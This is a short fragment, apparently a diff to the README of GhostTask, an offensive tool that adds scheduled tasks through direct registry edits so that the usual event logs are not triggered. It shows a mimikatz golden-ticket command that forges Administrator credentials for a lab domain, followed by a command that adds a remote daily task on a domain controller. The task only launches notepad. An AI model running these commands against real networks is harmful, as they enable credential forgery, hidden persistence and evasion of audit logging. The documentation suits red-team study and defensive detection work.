A tool employs direct registry manipulation to create scheduled tasks without triggering the usual event logs.

 kerberos::golden /domain:LAB.CORP /sid:S-1-5-21-1111111111-1111111111-1111111111 /aes256:[aes256hash] /user:Administrator /service:cifs /target:dc01.lab.corp /sids:S-1-5-18 /endin:600 /renewmax:10080

-Create a new scheduled task on the DC01 server remotely, which will launch notepad.exe every day at 3:19 pm:
+Create a new scheduled task remotely on the DC01 server that launches notepad.exe every day at 3:19 PM:

 GhostTask.exe DC01.lab.corp add demo "cmd.exe" "/c notepad.exe" LAB\Administrator daily 15:19